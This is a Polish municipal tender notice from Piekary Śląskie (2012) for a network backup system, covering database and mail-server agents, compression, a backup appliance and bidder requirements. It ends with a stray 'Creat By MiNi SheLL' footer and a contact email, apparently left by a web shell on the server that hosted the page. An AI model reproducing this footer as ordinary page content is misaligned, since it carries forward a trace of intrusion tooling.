f)	Przywracanie maszyn wirtualnych ma być możliwe z przekierowaniem Hypervisora (zmiana miejsca docelowego dla odtwarzanego backupu) ze wskazaniem hosta docelowego.
g)	System ma zapewniać zarządzanie zadaniami backupu i przywracania dla platformy wirtualnej z poziomu przeglądarki internetowej.
h)	System ma wspierać wiele mechanizmów transportu, w szczególności system ma wspierać backup maszyn wirtualnych bez konieczności użycia sieci LAN (z wykorzystaniem sieci SAN), za pośrednictwem wirtualnej sieci LAN lub bezpośrednio na urządzenie podłączone za pośrednictwem interfejsu SCSI.
i)	System ma mieć możliwość uaktywnienia mechanizmu deduplikacji danych dla backupu maszyn wirtualnych.
j)	Funkcjonalność deduplikacji ma być możliwa zarówno na poziomie centralnego serwera backupu jak i po stronie backupowanej maszyny. Funkcjonalność ta ma być definiowana (także włączana lub wyłączana) na poziomie pojedynczego zadania backupu.
k)	System ma mieć możliwość uaktywnienia kompresji danych dla backupu maszyn wirtualnych.
l)	Administrator ma mieć możliwość wyboru pomiędzy przynajmniej dwoma algorytmami kompresji, przy czym produkt ma umożliwiać wybór minimum algorytmów LZRW1 oraz LZRW3-A.

4.	Agent do backupu bazy danych PostgreSQL:
a)	Agent backupu ma wspierać hot-backup (backup w czasie pracy) dla bazy danych PostgreSQL w wersjach co najmniej 7.2 i nowszych na platformach FreeBSD, NetBSD, OpenBSD, Linux, Solaris i Windows.
b)	Backup ma być możliwy zarówno dla całych instancji, jak również dla poszczególnych baz danych.
c)	Backup ma być realizowany jako backup pełny.
d)	System ma mieć możliwość uaktywnienia mechanizmu deduplikacji danych dla backupu bazy danych PostgreSQL.
e)	Funkcjonalność deduplikacji ma być możliwa zarówno na poziomie centralnego serwera backupu jak i po stronie backupowanej maszyny. Funkcjonalność ta ma być definiowana (także włączana lub wyłączana) na poziomie pojedynczego zadania backupu.
f)	System ma mieć możliwość uaktywnienia kompresji danych dla backupu bazy danych PostgreSQL.
g)	Administrator ma mieć możliwość wyboru pomiędzy przynajmniej dwoma algorytmami kompresji, przy czym produkt ma umożliwiać wybór minimum algorytmów LZRW1 oraz LZRW3-A.

5.	Agent do backupu bazy danych MySQL:

a)	Agent backupu ma wspierać hot-backup (backup w czasie pracy) dla bazy danych MySQL w wersjach 3.23 i nowszych na platformach AIX, FreeBSD, NetBSD, HP-UX, Linux, Mac OS, Tru64 i Windows.
b)	Backup ma być możliwy zarówno dla całych baz danych, jak również dla poszczególnych tabel.
c)	System ma wspierać także backup dziennika binarnego (binary-log), celem późniejszego odtworzenia bazy do stanu z momentu wykonywania kopii zapasowej.
d)	Backup ma być realizowany jako backup pełny, jako backup przyrostowy oraz dyferencyjny.
e)	System ma mieć możliwość uaktywnienia mechanizmu deduplikacji danych dla backupu bazy danych MySQL.
f)	Funkcjonalność deduplikacji ma być możliwa zarówno na poziomie centralnego serwera backupu jak i po stronie backupowanej maszyny. Funkcjonalność ta ma być definiowana (także włączana lub wyłączana) na poziomie pojedynczego zadania backupu.
g)	System ma mieć możliwość uaktywnienia kompresji danych dla backupu bazy danych MySQL.
h)	Administrator ma mieć możliwość wyboru pomiędzy przynajmniej dwoma algorytmami kompresji, przy czym produkt ma umożliwiać wybór minimum algorytmów LZRW1 oraz LZRW3-A.

6.	Agent do backupu bazy danych MS-SQL:
a)	Agent backupu ma wspierać hot-backup (backup w czasie pracy) dla bazy danych MS-SQL w wersjach 7, 2000, 2005, 2008, 2008 R2.
b)	Backup ma być możliwy zarówno dla całych instancji, jak również dla poszczególnych baz danych, grup plików oraz indywidualnych plików.
c)	Backup ma być realizowany jako backup pełny, kopia (VSS), backup przyrostowy (VDI) oraz dyferencyjny.
d)	System ma wspierać relokację baz danych do innych instancji, pracujących nawet na innym hoście.
e)	System ma wspierać relokację z jednoczesną zmianą nazwy odtwarzanych obiektów.
f)	System ma mieć możliwość uaktywnienia mechanizmu deduplikacji danych dla backupu bazy danych MS-SQL.
g)	Funkcjonalność deduplikacji ma być możliwa zarówno na poziomie centralnego serwera backupu jak i po stronie backupowanej maszyny. Funkcjonalność ta ma być definiowana (także włączana lub wyłączana) na poziomie pojedynczego zadania backupu.
h)	System ma mieć możliwość uaktywnienia kompresji danych dla backupu bazy danych MS-SQL.
i)	Administrator ma mieć możliwość wyboru pomiędzy przynajmniej dwoma algorytmami kompresji, przy czym produkt ma umożliwiać wybór minimum algorytmów LZRW1 oraz LZRW3-A.

7.	Agent do backupu środowiska Active Directory:
a)	Agent backupu ma wspierać hot-backup (backup w czasie pracy) dla środowisk Active Directory w wersjach dla systemów Windows 2003, 2008 oraz 2008 R2.
b)	Backup ma być możliwy w trybie pełnym, całego katalogu Active Directory
c)	Backup ma być realizowany z wykorzystaniem mechanizmu VSS
d)	System ma wspierać odtwarzanie środowiska Active Directory w oryginalną lokalizację, na inną maszynę (migracja) oraz w formie pliku na dowolnej maszynie z zainstalowanym agentem systemu backupu
e)	System powinien umożliwiać odtwarzanie autorytatywne z możliwością oznaczania poszczególnych obiektów drzewa Active Directory
f)	System ma mieć możliwość uaktywnienia mechanizmu deduplikacji danych dla backupu Active Directory.
g)	Funkcjonalność deduplikacji ma być możliwa zarówno na poziomie centralnego serwera backupu jak i po stronie backupowanej maszyny. Funkcjonalność ta ma być definiowana (także włączana lub wyłączana) na poziomie pojedynczego zadania backupu.

ciąg dalszy określenia  przedmiotu oraz wielkości lub zakresu zamówienia : w sekcji IV.4.16) Informacje dodatkowe.....</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz oferty wraz ze specyfikacją oferowanego sprzętu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piekary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piekary Śląskie 
ul. Bytomska 84 
41-940 Piekary Śląskie 
Biuro Zamówień Publicznych , pok.218.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.09.2012 godzina 09:00, miejsce: Urząd Miasta Piekary Śląskie 
ul. Bytomska 84 
41-940 Piekary Śląskie 
Biuro Zamówień Publicznych , pok.218.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> ciąg dalszy z sekcji  II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia.

h)	System ma mieć możliwość uaktywnienia kompresji danych dla backupu usługi Active Directory
i)	Administrator ma mieć możliwość wyboru pomiędzy przynajmniej dwoma algorytmami kompresji, przy czym produkt ma umożliwiać wybór minimum algorytmów LZRW1 oraz LZRW3-A.

8.	Agent do backupu serwera pocztowego MS Exchange:
a)	Agent backupu ma wspierać hot-backup (backup w czasie pracy) dla serwera MS Exchange w wersjach 2000, 2003, 2007 i 2010.
b)	Backup ma być realizowany jako backup pełny, przyrostowy oraz dyferencyjny zarówno dla magazynów informacji (Information Stores), grup przechowywania (Storage Groups) jak i baz danych.
c)	Agent backupu ma wykorzystywać technologie Extensible Storage Engine (ESE) i Volume Shadow-Copy Service (VSS), wykonując zadania backupu w trakcie pracy serwera Exchange i nie zakłócając działania usługi.
d)	Agent backupu ma używać wbudowanego w Extensible Storage Engine (ESE) interfejsu programowania aplikacji (API), zachowując przestrzeganie ścisłych formatów backupu Microsoft zapewniając pełną integrację danych.
e)	System ma pozwalać na przywracanie danych do Recovery Storage Groups (Exchange 2007) i Recovery Databases (Exchange 2010)  na poziomie całych skrzynek jak i poszczególnych wiadomości.
f)	Agent backupu ma wspierać usługę replikacji (Site Replication Service), zapewniając kompatybilność pomiędzy serwerami MS Exchange 5.5 i 2000.
g)	Agent musi obsługiwać backup serwerów zarządzających kluczami (Key Management Server), pozwalając na odzyskanie danych zaszyfrowanych.
h)	Agent backupu musi umożliwiać pełne przywrócenie bazy serwera Exchange do stanu z określonego momentu (point-in-time).
i)	System musi umożliwiać backup klastrów CCR LCR SCR (Exchange 2007) i DAG (Exchange 2010).
j)	System ma mieć możliwość uaktywnienia mechanizmu deduplikacji danych dla backupu środowiska MS Exchange.
k)	Funkcjonalność deduplikacji ma być możliwa zarówno na poziomie centralnego serwera backupu jak i po stronie backupowanej maszyny. Funkcjonalność ta ma być definiowana (także włączana lub wyłączana) na poziomie pojedynczego zadania backupu.
l)	System ma mieć możliwość uaktywnienia kompresji danych dla backupu środowiska MS Exchange.
m)	Administrator ma mieć możliwość wyboru pomiędzy przynajmniej dwoma algorytmami kompresji, przy czym produkt ma umożliwiać wybór minimum algorytmów LZRW1 oraz LZRW3-A.

9.	Agent do backupu serwera LDAP:

a)	Agent backupu ma wspierać hot-backup (backup w czasie pracy) dla serwera OpenLDAP oraz innych serwerów LDAP zgodnych z wersją 3 tego protokołu (np. Novell OES eDirectory)
b)	Backup ma być możliwy dla całego katalogu struktury LDAP jak również dla poszczególnych jego elementów z możliwością wyboru CN lub OU do backupu.
c)	Backup ma być realizowany jako backup pełny oraz backup przyrostowy dla każdego z elementów struktury LDAP.
d)	Proces odtwarzania wybranych elementów, jak również całego katalogu LDAP nie powinien wymagać zatrzymywania ani restartu usługi katalogowej.
e)	Konfiguracja danych autoryzacji do usługi katalogowej LDAP powinna być możliwa zarówno z poziomu pliku konfiguracyjnego agenta, jak również z poziomu interfejsu Web.
f)	Agent backupu musi umożliwiać pełne odtworzenie struktury katalogu LDAP do momentu w którym wykonano backup (odrzucenie wpisów dodanych w późniejszym okresie) jak również odtwarzanie z zachowaniem tychże wpisów (z nadpisaniem wpisów uszkodzonych).
g)	Administrator ma mieć możliwość wyboru pomiędzy przynajmniej dwoma algorytmami kompresji, przy czym produkt ma umożliwiać wybór minimum algorytmów LZRW1 oraz LZRW3-A.

10.	Agent do backupu bazy danych Oracle:

a)	Agent backupu ma wspierać hot-backup (backup w czasie pracy) dla baz danych Oracle w wersjach 8.1.6 i nowszych na platformach Windows, Linux, HP-UX, AIX, Solaris.
b)	Backup ma być możliwy za pośrednictwem narzędzia Oracle RMAN. Niedopuszczalne jest wykorzystanie innych sposobów na backup bazy danych niż poprzez narzędzie RMAN.
c)	System ma mieć możliwość uaktywnienia mechanizmu deduplikacji danych dla backupu bazy danych Oracle.
d)	Funkcjonalność deduplikacji ma być możliwa zarówno na poziomie centralnego serwera backupu jak i po stronie backupowanej maszyny. Funkcjonalność ta ma być definiowana (także włączana lub wyłączana) na poziomie pojedynczego zadania backupu.
e)	System ma mieć możliwość uaktywnienia kompresji danych dla backupu bazy danych Oracle.
f)	Administrator ma mieć możliwość wyboru pomiędzy przynajmniej dwoma algorytmami kompresji, przy czym produkt ma umożliwiać wybór minimum algorytmów LZRW1 oraz LZRW3-A.

V.	Dedykowane urządzenie komputerowe (serwer sieciowego systemu kopii zapasowej) do wykonywania kopii bezpieczeństwa danych:

1.	Urządzenie powinno być wyposażone w minimum 2 dyski 3,5 o łącznej pojemności 4TB
2.	Urządzenie powinno korzystać z macierzy RAID poziomu 1, co umożliwi administratorowi za zapisanie 2TB danych
3.	Dyski w urządzeniu powinny być montowane w postaci zatok na froncie urządzenia
4.	Zatoki powinny oferować funkcjonalność hot-swap czyli wymianę dowolnego dysku w czasie pracy urządzenia
5.	Frontowy panel urządzenia powinien mieć możliwość zamknięcia celem ograniczenia dostępu do zatok dyskowych dla osób postronnych
6.	Urządzenie powinno być dostarczone wraz z interfejsem SCSI, który umożliwi zamawiającemu podłączenie dedykowanego napędu taśmowego lub biblioteki taśmowej, celem zapisu danych na taśmę
7.	Urządzenie powinno mieć możliwość rozszerzenia o kartę z interfejsem SAS, celem podłączenia dedykowanego napędu taśmowego lub biblioteki taśmowej, celem zapisu danych na taśmę
8.	Urządzenie powinno być wyposażone w minimum dwa interfejsy GigabitEthernet o prędkości 1Gb s
9.	Urządzenie powinno być wyposażone w dedykowany port IPMI Ethernet celem zarządzania zdalnego urządzeniem (wraz z dostępem KVM-over-IP), port ten nie powinien być portem wykorzystywanym do zadań backupu
10.	Dostarczone urządzenie powinno być w formie sprzętu instalowanego w standardowej szafie 19  o wielkości nie większej niż 2U

VI.	Informacje dodatkowe dot. specyfikacji systemu:

1.	Dostarczony system musi posiadać dokumentację w języku polskim, co najmniej dwuletnią gwarancję. Gwarancja na sprzęt obejmuje odbiór i dostawę serwisowanego sprzętu w siedzibie zamawiającego. 
2.	Dla wyspecyfikowanego systemu podane parametry są wartościami progowymi (tzn. minimalnymi), każdy system o parametrach lepszych od wyspecyfikowanych spełnia tą specyfikację.
3.	Wszystkie parametry dotyczą danych producenta systemu z wykorzystaniem jego firmowych materiałów eksploatacyjnych, w razie jakichkolwiek wątpliwości muszą być potwierdzone dokumentacją producenta przedstawioną przez oferenta.
4.	System powinien spełniać wszelkie przepisy dot. prawa dopuszczenia  do użytkowania w Polsce oraz posiadać stosowne dokumenty świadczące o spełnianiu wszystkich niezbędnych norm i wytycznych, które powinien spełniać ww system przed dopuszczeniem go do użytkowania. Kopie tych dokumentów oferent powinien dostarczyć razem ze systemem, wraz z oświadczeniem o ich zgodności z oryginałem.
5.	W zamówieniu oferowany może być jedynie system fabrycznie nowy, nigdzie nieużywany poza oczywistą sytuacją związaną  z jego testowaniem.
6.	Dostawca zobowiązany jest wymienić system na nowy o takich samych lub lepszych parametrach po 3 kolejnych naprawach serwisowych nie usuwających objawów awarii.
7.	Zgodnie z art. 29 ust. 3 ustawy Prawo Zamówień Publicznych przedmiotu zamówienia nie można opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia. W każdym przypadku w którym użyto znaków towarowych w tej specyfikacji jest to podyktowane specyfiką zamawianego systemu oraz środowiska i zaplecza systemowo-sieciowego w którym takie urządzenie musi pracować. Za użyciem ww zapisów przemawia także wymóg 100% kompatybilności z obecnie posiadaną infrastrukturą sieciowo-systemowo-sprzętową.

Przykładowy system spełniający specyfikację: Arkeia Network Backup System.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com